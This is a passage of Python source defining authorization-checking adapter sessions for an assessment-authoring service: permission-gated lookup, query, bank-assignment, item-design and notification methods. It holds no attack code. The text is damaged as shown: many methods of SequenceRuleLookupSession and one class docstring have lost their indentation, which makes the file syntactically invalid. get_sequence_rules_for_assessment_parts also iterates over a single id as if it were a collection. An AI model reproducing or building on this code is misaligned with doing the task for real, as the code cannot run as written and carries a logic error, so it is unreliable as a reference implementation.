        return self._provider_session.get_assessment_part_form_for_update(assessment_part_id)
    def duplicate_assessment_part(self, assessment_part_id):
        # NOTE(review): uses the blanket 'update' check rather than the
        # per-object _can_for_assessment_part used by the other mutators —
        # confirm intended.
        if not self._can('update'):
            raise PermissionDenied()
        return self._provider_session.duplicate_assessment_part(assessment_part_id)
    @raise_null_argument
    def update_assessment_part(self, assessment_part_id, assessment_part_form):
        """Update an assessment part (requires blanket 'update')."""
        if not self._can('update'):
            raise PermissionDenied()
        return self._provider_session.update_assessment_part(assessment_part_id, assessment_part_form)
    def can_delete_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_delete_resources
        # True with a blanket 'delete' authorization or any overriding catalog.
        return (self._can('delete') or
                bool(self._get_overriding_catalog_ids('delete')))
    @raise_null_argument
    def delete_assessment_part(self, assessment_part_id):
        """Delete an assessment part, vetted per-object."""
        # Implemented from azosid template for -
        # osid.learning.ObjectiveAdminSession.delete_objective_template
        if not self._can_for_assessment_part('delete', assessment_part_id):
            raise PermissionDenied()
        return self._provider_session.delete_assessment_part(assessment_part_id)
    def can_manage_assessment_part_aliases(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.can_manage_resource_aliases
        # True with a blanket 'manage' authorization or any overriding catalog.
        return (self._can('manage') or
                bool(self._get_overriding_catalog_ids('manage')))
    @raise_null_argument
    def alias_assessment_part(self, assessment_part_id, alias_id):
        """Alias an assessment part id, vetted per-object."""
        # Implemented from azosid template for -
        # osid.resource.ResourceAdminSession.alias_resources
        if not self._can_for_assessment_part('alias', assessment_part_id):
            raise PermissionDenied()
        return self._provider_session.alias_assessment_part(assessment_part_id, alias_id)
class AssessmentPartNotificationSession(abc_assessment_authoring_sessions.AssessmentPartNotificationSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartNotificationSession methods with authorization checks.

    Registration calls require the 'register' authorization. The
    reliable/unreliable/acknowledge trio passes straight through to the
    provider session.

    Fix: the original class defined reliable_assessment_part_notifications,
    unreliable_assessment_part_notifications, and
    acknowledge_assessment_part_notification TWICE with identical bodies;
    the dead duplicate definitions have been removed.
    """
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # The bound bank is the qualifier for all authorization checks.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.AssessmentPart'
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the bank, provided the agent holds the 'lookup' authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        else:
            return self._provider_session.get_bank()
    bank = property(fget=get_bank)
    def can_register_for_assessment_part_notifications(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.can_register_for_resource_notifications
        return self._can('register')
    def use_federated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        # NOTE(review): _query_session is not set in this class's __init__;
        # presumably supplied by OsidSession — confirm.
        if self._query_session:
            self._query_session.use_federated_bank_view()
    def use_isolated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()
    def reliable_assessment_part_notifications(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        # Pass-through; no authorization required to toggle reliability.
        self._provider_session.reliable_assessment_part_notifications()
    def unreliable_assessment_part_notifications(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        # Pass-through; no authorization required to toggle reliability.
        self._provider_session.unreliable_assessment_part_notifications()
    @raise_null_argument
    def acknowledge_assessment_part_notification(self, notification_id):
        # Acknowledgement is not supported by this authorization adapter.
        raise Unimplemented()
    def register_for_new_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_new_resources
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_new_assessment_parts()
    def register_for_changed_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_changed_resources
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_assessment_parts()
    @raise_null_argument
    def register_for_changed_assessment_part(self, assessment_part_id):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_changed_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_assessment_part(assessment_part_id)
    def register_for_deleted_assessment_parts(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_deleted_resources
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_assessment_parts()
    @raise_null_argument
    def register_for_deleted_assessment_part(self, assessment_part_id):
        # Implemented from azosid template for -
        # osid.resource.ResourceNotificationSession.register_for_deleted_resource
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_assessment_part(assessment_part_id)
class AssessmentPartBankSession(abc_assessment_authoring_sessions.AssessmentPartBankSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartBankSession methods with authorization checks."""
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # Mapping lookups are qualified at the root bank rather than a
        # specific catalog.
        self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU')  # This could be better
        self._id_namespace = 'assessment_authoring.AssessmentPartBank'
    def can_lookup_assessment_part_bank_mappings(self):
        """Authorization hint for looking up part/bank mappings."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.can_lookup_resource_bin_mappings
        return self._can('lookup')
    def use_comparative_assessment_part_bank_view(self):
        """Pass through: prefer the comparative (permissive) bank view."""
        # Implemented from azosid template for -
        # osid.resource.BinLookupSession.use_comparative_bin_view_template
        self._provider_session.use_comparative_assessment_part_bank_view()
    def use_plenary_assessment_part_bank_view(self):
        """Pass through: prefer the plenary (exact) bank view."""
        # Implemented from azosid template for -
        # osid.resource.BinLookupSession.use_plenary_bin_view_template
        self._provider_session.use_plenary_assessment_part_bank_view()
    @raise_null_argument
    def get_assessment_part_ids_by_bank(self, bank_id):
        """Return ids of parts mapped to a bank (requires 'lookup')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resource_ids_by_bin
        if self._can('lookup'):
            return self._provider_session.get_assessment_part_ids_by_bank(bank_id)
        raise PermissionDenied()
    @raise_null_argument
    def get_assessment_parts_by_bank(self, bank_id):
        """Return parts mapped to a bank (requires 'lookup')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resources_by_bin_template
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_by_bank(bank_id)
        raise PermissionDenied()
    @raise_null_argument
    def get_assessment_part_ids_by_banks(self, bank_ids):
        """Return ids of parts mapped to any of several banks (requires 'lookup')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resource_ids_by_bins
        if self._can('lookup'):
            return self._provider_session.get_assessment_part_ids_by_banks(bank_ids)
        raise PermissionDenied()
    @raise_null_argument
    def get_assessment_parts_by_banks(self, bank_ids):
        """Return parts mapped to any of several banks (requires 'lookup')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_resources_by_bins
        if self._can('lookup'):
            return self._provider_session.get_assessment_parts_by_banks(bank_ids)
        raise PermissionDenied()
    @raise_null_argument
    def get_bank_ids_by_assessment_part(self, assessment_part_id):
        """Return ids of banks a part is mapped to (requires 'lookup')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_bin_ids_by_resource
        if self._can('lookup'):
            return self._provider_session.get_bank_ids_by_assessment_part(assessment_part_id)
        raise PermissionDenied()
    @raise_null_argument
    def get_banks_by_assessment_part(self, assessment_part_id):
        """Return banks a part is mapped to (requires 'lookup')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinSession.get_bins_by_resource
        if self._can('lookup'):
            return self._provider_session.get_banks_by_assessment_part(assessment_part_id)
        raise PermissionDenied()
class AssessmentPartBankAssignmentSession(abc_assessment_authoring_sessions.AssessmentPartBankAssignmentSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartBankAssignmentSession methods with authorization checks."""
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # Assignment operations are qualified at the root bank rather than a
        # specific catalog.
        self._qualifier_id = Id('assessment_authoring.Bank%3AROOT%40ODL.MIT.EDU')  # This could be better
        self._id_namespace = 'assessment_authoring.AssessmentPartBank'
    def can_assign_assessment_parts(self):
        """Authorization hint for assigning parts to banks."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.can_assign_resources
        return self._can('assign')
    @raise_null_argument
    def can_assign_assessment_parts_to_bank(self, bank_id):
        """Authorization hint for assigning parts to one specific bank."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.can_assign_resources_to_bin
        return self._can('assign', qualifier_id=bank_id)
    @raise_null_argument
    def get_assignable_bank_ids(self, bank_id):
        """Return banks assignable from bank_id (requires 'assign')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids
        if self._can('assign'):
            return self._provider_session.get_assignable_bank_ids(bank_id)
        raise PermissionDenied()
    @raise_null_argument
    def get_assignable_bank_ids_for_assessment_part(self, bank_id, assessment_part_id):
        """Return banks assignable for a specific part (requires 'assign')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.get_assignable_bin_ids_for_resource
        if self._can('assign'):
            return self._provider_session.get_assignable_bank_ids_for_assessment_part(bank_id, assessment_part_id)
        raise PermissionDenied()
    @raise_null_argument
    def assign_assessment_part_to_bank(self, assessment_part_id, bank_id):
        """Map a part into a bank (requires 'assign')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
        if self._can('assign'):
            return self._provider_session.assign_assessment_part_to_bank(assessment_part_id, bank_id)
        raise PermissionDenied()
    @raise_null_argument
    def unassign_assessment_part_from_bank(self, assessment_part_id, bank_id):
        """Remove a part's mapping to a bank (requires 'assign')."""
        # Implemented from azosid template for -
        # osid.resource.ResourceBinAssignmentSession.assign_resource_to_bin
        if self._can('assign'):
            return self._provider_session.unassign_assessment_part_from_bank(assessment_part_id, bank_id)
        raise PermissionDenied()
    @raise_null_argument
    def reassign_assessment_part_to_bank(self, assessment_part_id, from_biank_id, to_bank_id):
        # NOTE(review): 'from_biank_id' is misspelled but kept — renaming a
        # public parameter would break keyword callers.
        raise Unimplemented()
class AssessmentPartSmartBankSession(abc_assessment_authoring_sessions.AssessmentPartSmartBankSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartSmartBankSession methods with authorization checks.

    Smart-bank management itself is unimplemented; only the bound bank is
    exposed.
    """
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the bank, provided the agent holds the 'lookup' authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()
    bank = property(fget=get_bank)
    def can_manage_smart_banks(self):
        # Smart banks are not supported by this authorization adapter.
        raise Unimplemented()
    def get_assessment_part_query(self):
        raise Unimplemented()
    assessment_part_query = property(fget=get_assessment_part_query)
    def get_assessment_part_search_order(self):
        raise Unimplemented()
    assessment_part_search_order = property(fget=get_assessment_part_search_order)
    @raise_null_argument
    def apply_assessment_part_query(self, assessment_part_query):
        raise Unimplemented()
    def inspect_assessment_part_query(self):
        raise Unimplemented()
    @raise_null_argument
    def apply_assessment_part_sequencing(self, assessment_part_search_order):
        raise Unimplemented()
    @raise_null_argument
    def get_assessment_part_query_from_inspector(self, assessment_part_query_inspector):
        raise Unimplemented()
class AssessmentPartItemSession(abc_assessment_authoring_sessions.AssessmentPartItemSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartItemSession methods with authorization checks."""
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # The bound bank is the qualifier for all authorization checks.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.AssessmentPart'
        self._auth_bank_ids = None
        self._unauth_bank_ids = None
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the bank, provided the agent holds the 'lookup' authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()
    bank = property(fget=get_bank)
    def can_access_assessment_part_items(self):
        # Defer entirely to the provider's own access check.
        return self._provider_session.can_access_assessment_part_items()
    def use_comparative_asseessment_part_item_view(self):
        # NOTE(review): 'asseessment' misspelling is part of the public name
        # and is mirrored by the provider call; renaming would break callers.
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_comparative_resource_view_template
        self._use_comparative_object_view()
        self._provider_session.use_comparative_asseessment_part_item_view()
    def use_plenary_assessment_part_item_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_plenary_resource_view_template
        self._use_plenary_object_view()
        self._provider_session.use_plenary_assessment_part_item_view()
    def use_federated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()
    def use_isolated_bank_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()
    @raise_null_argument
    def get_assessment_part_items(self, assessment_part_id):
        """Return the items on an assessment part (requires 'access')."""
        if self._can('access'):
            return self._provider_session.get_assessment_part_items(assessment_part_id)
        raise PermissionDenied()
    @raise_null_argument
    def get_assessment_parts_by_item(self, item_id):
        """Return assessment parts containing an item (requires 'access')."""
        if self._can('access'):
            return self._provider_session.get_assessment_parts_by_item(item_id)
        raise PermissionDenied()
class AssessmentPartItemDesignSession(abc_assessment_authoring_sessions.AssessmentPartItemDesignSession, osid_sessions.OsidSession):
    """Adapts underlying AssessmentPartItemDesignSession methods with authorization checks."""
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # The bound bank is the qualifier for all authorization checks.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.AssessmentPart'
        self._auth_bank_ids = None
        self._unauth_bank_ids = None
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
    def get_bank(self):
        """Return the bank, provided the agent holds the 'lookup' authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()
    bank = property(fget=get_bank)
    def can_design_assessment_parts(self):
        # Defer entirely to the provider's own design check.
        return self._provider_session.can_design_assessment_parts()
    @raise_null_argument
    def add_item(self, item_id, assessment_part_id):
        """Add an item to an assessment part (requires 'compose')."""
        if self._can('compose'):
            return self._provider_session.add_item(item_id, assessment_part_id)
        raise PermissionDenied()
    @raise_null_argument
    def move_item_ahead(self, item_id, assessment_part_id, reference_id):
        """Move an item ahead of a reference item (requires 'compose')."""
        if self._can('compose'):
            return self._provider_session.move_item_ahead(item_id, assessment_part_id, reference_id)
        raise PermissionDenied()
    @raise_null_argument
    def move_item_behind(self, item_id, assessment_part_id, reference_id):
        """Move an item behind a reference item (requires 'compose')."""
        if self._can('compose'):
            return self._provider_session.move_item_behind(item_id, assessment_part_id, reference_id)
        raise PermissionDenied()
    @raise_null_argument
    def order_items(self, item_ids, assessment_part_id):
        """Reorder the items on an assessment part (requires 'compose')."""
        if self._can('compose'):
            return self._provider_session.order_items(item_ids, assessment_part_id)
        raise PermissionDenied()
    @raise_null_argument
    def remove_item(self, item_id, assessment_part_id):
        """Remove an item from an assessment part (requires 'compose')."""
        if self._can('compose'):
            return self._provider_session.remove_item(item_id, assessment_part_id)
        raise PermissionDenied()
class SequenceRuleLookupSession(abc_assessment_authoring_sessions.SequenceRuleLookupSession, osid_sessions.OsidSession):
"""Adapts underlying SequenceRuleLookupSession methodswith authorization checks."""
    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        # The bound bank is the qualifier for all authorization checks.
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.SequenceRule'
        # Default views: federated catalogs, comparative objects.
        self.use_federated_bank_view()
        self.use_comparative_sequence_rule_view()
        self._auth_bank_ids = None
        # Lazily-computed cache of bank ids the agent may NOT look up.
        self._unauth_bank_ids = None
        # self._overriding_bank_ids = None
    #
    # def _get_overriding_bank_ids(self):
    #     if self._overriding_bank_ids is None:
    #         self._overriding_bank_ids = self._get_overriding_catalog_ids('lookup')
    #     return self._overriding_bank_ids
def _try_overriding_banks(self, query):
if self._get_overriding_catalog_ids('lookup') is not None:
for catalog_id in self._get_overriding_catalog_ids('lookup'):
query.match_bank_id(catalog_id, match=True)
return self._query_session.get_sequence_rules_by_query(query), query
def _get_unauth_bank_ids(self, bank_id):
if self._can('lookup', bank_id):
return [] # Don't go further - assumes authorizations inherited
else:
unauth_list = [str(bank_id)]
if self._hierarchy_session.has_child_banks(bank_id):
for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
return unauth_list
    def _try_harder(self, query):
        """Run the query against overriding banks, then widen by excluding unauthorized banks."""
        results, query = self._try_overriding_banks(query)
        if self._is_isolated_catalog_view():
            # NOTE(review): in isolated view, comparative object view returns
            # the override-only results even when empty — confirm intended.
            if results.available() or self._is_comparative_object_view():
                return results
        if self._is_plenary_object_view():
            return results
        if self._hierarchy_session is None or self._query_session is None:
            # Cannot widen without hierarchy/query support; settle for what we have.
            return results
        if self._unauth_bank_ids is None:
            self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
        for bank_id in self._unauth_bank_ids:
            query.match_bank_id(bank_id, match=False)
        return self._query_session.get_sequence_rules_by_query(query)
    def get_bank_id(self):
        """Return the ``Id`` of the bank this session is bound to."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()
    bank_id = property(fget=get_bank_id)
def get_bank(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_bin_template
if not self._can('lookup'):
raise PermissionDenied()
else:
return self._provider_session.get_bank()
bank = property(fget=get_bank)
    def can_lookup_sequence_rules(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.can_lookup_resources_template
        # True with a blanket 'lookup' authorization or any overriding catalog.
        return (self._can('lookup') or
                bool(self._get_overriding_catalog_ids('lookup')))
    def use_comparative_sequence_rule_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_comparative_resource_view_template
        # Set the comparative flag locally, then mirror it on the provider.
        self._use_comparative_object_view()
        self._provider_session.use_comparative_sequence_rule_view()
    def use_plenary_sequence_rule_view(self):
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_plenary_resource_view_template
        # Set the plenary flag locally, then mirror it on the provider.
        self._use_plenary_object_view()
        self._provider_session.use_plenary_sequence_rule_view()
    def use_federated_bank_view(self):
        """Federate the view: include sequence rules from descendant banks."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            # Keep the fallback query session's view in sync with this session.
            self._query_session.use_federated_bank_view()
    def use_isolated_bank_view(self):
        """Isolate the view: restrict lookups to this session's bank only."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            # Keep the fallback query session's view in sync with this session.
            self._query_session.use_isolated_bank_view()
    def use_active_sequence_rule_view(self):
        """Only active sequence rules are returned by lookup methods."""
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_active_composition_view
        return self._provider_session.use_active_sequence_rule_view()
    def use_any_status_sequence_rule_view(self):
        """Active and inactive sequence rules are returned by lookup methods."""
        # Implemented from azosid template for -
        # osid.composition.CompositionLookupSession.use_any_status_composition_view
        return self._provider_session.use_any_status_sequence_rule_view()
@raise_null_argument
def get_sequence_rule(self, sequence_rule_id):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resource_template
if self._can('lookup'):
return self._provider_session.get_sequence_rule(sequence_rule_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_id(sequence_rule_id, match=True)
results = self._try_harder(query)
if results.available():
return results.next()
raise NotFound()
@raise_null_argument
def get_sequence_rules_by_ids(self, sequence_rule_ids):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_ids_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_ids(sequence_rule_ids)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
for sequence_rule_id in (sequence_rule_ids):
query.match_id(sequence_rule_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_by_genus_type(self, sequence_rule_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_genus_type(sequence_rule_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_genus_type(sequence_rule_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_by_parent_genus_type(self, sequence_rule_genus_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_parent_genus_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_parent_genus_type(sequence_rule_genus_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_parent_genus_type(sequence_rule_genus_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_by_record_type(self, sequence_rule_record_type):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_by_record_type_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_by_record_type(sequence_rule_record_type)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_record_type(sequence_rule_record_type, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_for_assessment_part(self, assessment_part_id):
# Implemented from azosid template for -
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_for_assessment_part(assessment_part_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_assessment_part_id(assessment_part_id, match=True)
return self._try_harder(query)
    @raise_null_argument
    def get_sequence_rules_for_next_assessment_part(self, next_assessment_part_id):
        """Not supported by this adapter."""
        raise Unimplemented()
@raise_null_argument
def get_sequence_rules_for_assessment_parts(self, assessment_part_id, next_assessment_part_id):
if self._can('lookup'):
return self._provider_session.get_sequence_rules_for_assessment_parts(assessment_part_id,
next_assessment_part_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
for sequence_rule_id in (assessment_part_id):
query.match_assessment_part_id(sequence_rule_id, match=True)
return self._try_harder(query)
@raise_null_argument
def get_sequence_rules_for_assessment(self, assessment_id):
# Implemented from azosid template for -
# osid.learning.ActivityLookupSession.get_activities_for_objective_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules_for_assessment(assessment_id)
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_assessment_id(assessment_id, match=True)
return self._try_harder(query)
def get_sequence_rules(self):
# Implemented from azosid template for -
# osid.resource.ResourceLookupSession.get_resources_template
if self._can('lookup'):
return self._provider_session.get_sequence_rules()
self._check_lookup_conditions() # raises PermissionDenied
query = self._query_session.get_sequence_rule_query()
query.match_any(match=True)
return self._try_harder(query)
sequence_rules = property(fget=get_sequence_rules)
class SequenceRuleQuerySession(abc_assessment_authoring_sessions.SequenceRuleQuerySession, osid_sessions.OsidSession):
    """Adapts underlying SequenceRuleQuerySession methods with authorization checks."""

    def __init__(self, *args, **kwargs):
        osid_sessions.OsidSession.__init__(self, *args, **kwargs)
        self._qualifier_id = self._provider_session.get_bank_id()
        self._id_namespace = 'assessment_authoring.SequenceRule'
        self.use_federated_bank_view()
        self._unauth_bank_ids = None

    def _try_overriding_banks(self, query):
        """Add any banks with overriding 'search' authorization and run the query.

        Returns a ``(results, query)`` tuple so the caller can keep refining
        the same query object.
        """
        # Hoisted: the original called _get_overriding_catalog_ids twice.
        overriding_ids = self._get_overriding_catalog_ids('search')
        if overriding_ids is not None:
            for bank_id in overriding_ids:
                query._provider_query.match_bank_id(bank_id, match=True)
        return self._query_session.get_sequence_rules_by_query(query), query

    def _get_unauth_bank_ids(self, bank_id):
        """Recursively collect ids (as strings) of banks this agent cannot search."""
        if self._can('search', bank_id):
            return []  # Don't go further - assumes authorizations inherited
        unauth_list = [str(bank_id)]
        if self._hierarchy_session.has_child_banks(bank_id):
            for child_bank_id in self._hierarchy_session.get_child_bank_ids(bank_id):
                unauth_list = unauth_list + self._get_unauth_bank_ids(child_bank_id)
        return unauth_list

    def _try_harder(self, query):
        """Fallback search: try overriding banks, then mask unauthorized banks."""
        results, query = self._try_overriding_banks(query)
        if self._is_isolated_catalog_view():
            if results.available():
                return results
        if self._hierarchy_session is None or self._query_session is None:
            # Cannot walk the bank hierarchy; best effort is the overriding results.
            return results
        if self._unauth_bank_ids is None:
            # Cache the unauthorized bank ids for the life of the session.
            self._unauth_bank_ids = self._get_unauth_bank_ids(self._qualifier_id)
        for bank_id in self._unauth_bank_ids:
            query._provider_query.match_bank_id(bank_id, match=False)
        return self._query_session.get_sequence_rules_by_query(query)

    class SequenceRuleQueryWrapper(QueryWrapper):
        """Wrapper for SequenceRuleQueries to override match_bank_id method"""

        def match_bank_id(self, bank_id, match=True):
            # Defer bank matching: the session authz-checks each recorded bank
            # id before forwarding it to the provider query.
            self._cat_id_args_list.append({'bank_id': bank_id, 'match': match})

    def get_bank_id(self):
        """Return the ``Id`` of the ``Bank`` associated with this session."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_id_template
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the ``Bank`` associated with this session, if authorized."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.get_bin_template
        if not self._can('lookup'):
            raise PermissionDenied()
        return self._provider_session.get_bank()

    bank = property(fget=get_bank)

    def can_search_sequence_rules(self):
        """Test whether this agent may perform sequence rule searches."""
        # Implemented from azosid template for -
        # osid.resource.ResourceQuerySession.can_search_resources_template
        return (self._can('search') or
                bool(self._get_overriding_catalog_ids('search')))

    def use_federated_bank_view(self):
        """Federate the view: include sequence rules from descendant banks."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_federated_bin_view_template
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()

    def use_isolated_bank_view(self):
        """Isolate the view: restrict searches to this session's bank only."""
        # Implemented from azosid template for -
        # osid.resource.ResourceLookupSession.use_isolated_bin_view_template
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()

    def get_sequence_rule_query(self):
        """Get a wrapped query whose match_bank_id calls are authz-checked later."""
        # Implemented from azosid template for -
        # osid.resource.ResourceQuerySession.get_resource_query_template
        if (not self._can('search') and
                self._is_isolated_catalog_view()):
            raise PermissionDenied()
        return self.SequenceRuleQueryWrapper(self._provider_session.get_sequence_rule_query())

    sequence_rule_query = property(fget=get_sequence_rule_query)

    @raise_null_argument
    def get_sequence_rules_by_query(self, sequence_rule_query):
        """Get sequence rules matching the given query, subject to authorization."""
        # Implemented from azosid template for -
        # osid.resource.ResourceQuerySession.get_resources_by_query_template
        if not hasattr(sequence_rule_query, '_cat_id_args_list'):
            raise Unsupported('sequence_rule_query not from this session')
        for kwargs in sequence_rule_query._cat_id_args_list:
            # Only forward bank-id terms the agent is authorized to search.
            if self._can('search', kwargs['bank_id']):
                sequence_rule_query._provider_query.match_bank_id(**kwargs)
        if self._can('search'):
            return self._provider_session.get_sequence_rules_by_query(sequence_rule_query)
        self._check_search_conditions()
        result = self._try_harder(sequence_rule_query)
        sequence_rule_query._provider_query.clear_bank_terms()
        return result
